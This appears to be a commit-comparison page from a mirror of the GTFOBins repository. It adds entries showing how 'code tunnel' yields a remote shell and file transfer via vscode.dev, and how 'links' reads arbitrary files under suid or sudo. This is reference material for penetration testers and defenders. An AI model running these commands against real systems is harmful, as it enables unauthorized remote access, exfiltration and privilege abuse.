1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-13 02:56:02 +02:00

Compare commits

...

4 Commits

Author SHA1 Message Date
vhash bfa6d2d4a8
Merge 70d0ff6a74 into 97f46f1526 2024-04-24 13:27:17 +08:00
Juampa Rodríguez 97f46f1526
Create links
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2024-04-10 22:46:01 +02:00
vhash 70d0ff6a74 add file-{upload,download} 2023-09-25 15:59:18 +02:00
Lucas VAN HAAREN 6803fc5b9d
add code GTFOBIN 2023-09-25 15:19:43 +02:00
2 changed files with 39 additions and 0 deletions

23
_gtfobins/code.md Normal file
View File

@ -0,0 +1,23 @@
---
functions:
reverse-shell:
- description: |
Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`.
Select `View \ Terminal` to spawn a shell on remote.
code: code tunnel -name 'my-tunnel-name'
file-upload:
- description: |
Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`.
In the `Explorer` tab, select `Open Folder`, then right-click on the folder and select `Upload`.
Select file from the local file browser.
code: code tunnel -name 'my-tunnel-name'
file-download:
- description: |
Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`.
In the `Explorer` tab, select `Open Folder`, then select a file, right-click and select `Download`.
code: code tunnel -name 'my-tunnel-name'
---

16
_gtfobins/links.md Normal file
View File

@ -0,0 +1,16 @@
---
description: The result is displayed in a TUI interface.
functions:
file-read:
- code: |
LFILE=file_to_read
links "$LFILE"
suid:
- code: |
LFILE=file_to_read
./links "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo links "$LFILE"
---